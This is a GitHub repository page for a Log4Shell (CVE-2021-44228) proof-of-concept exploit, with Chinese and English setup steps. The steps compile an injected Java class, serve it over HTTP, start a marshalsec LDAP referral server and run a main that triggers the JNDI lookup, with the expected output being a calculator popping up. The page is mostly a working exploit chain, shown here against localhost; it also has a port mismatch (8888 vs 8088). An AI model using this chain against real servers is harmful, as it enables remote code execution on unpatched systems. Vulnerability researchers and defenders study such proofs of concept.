Skip to content

lonecloud/CVE-2021-44228-Apache-Log4j

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

5 Commits
 
 
 
 
 
 
 
 
 
 

Repository files navigation

CVE-2021-44228(Apache Log4j Remote Code Execution)

Versions Affected: all versions from 2.0-beta9 through 2.12.1 and 2.13.0 through 2.15.0

Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)

Usage:

  1. 下载该项目,编译InjectClazz.java
# download
git clone http://github.com/lonecloud/CVE-2021-44228-Apache-Log4j
cd CVE-2021-44228-Apache-Log4j
javac InjectClazz.java
  1. 在InjectClazz所在目录下启动web服务器
# start webserver
# For Python2
python -m SimpleHTTPServer 8888
# For Python3
python3 -m http.server 8888
# 
  1. 下载LDAP 服务器
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
mvn clean package -DskipTests
java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8088/#InjectClazz" 1389
  1. 运行项目
cd CCVE-2021-44228-Apache-Log4j
mvn clean package
java -cp target/CVE-2021-44228-Apache-Log4j-1.0-SNAPSHOT-all.jar Log4jAceMain


# expect the following
# 1. calculator app appear
# 2. in ldapserver console,
Send LDAP reference result for Exploit redirecting to http://127.0.0.1:8088/InjectClazz.class
# 3. in webserver console,
#  127.0.0.1 - - [....] "GET /InjectClazz.class HTTP/1.1" 200 -

About

CVE-2021-44228-Apache-Log4j

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages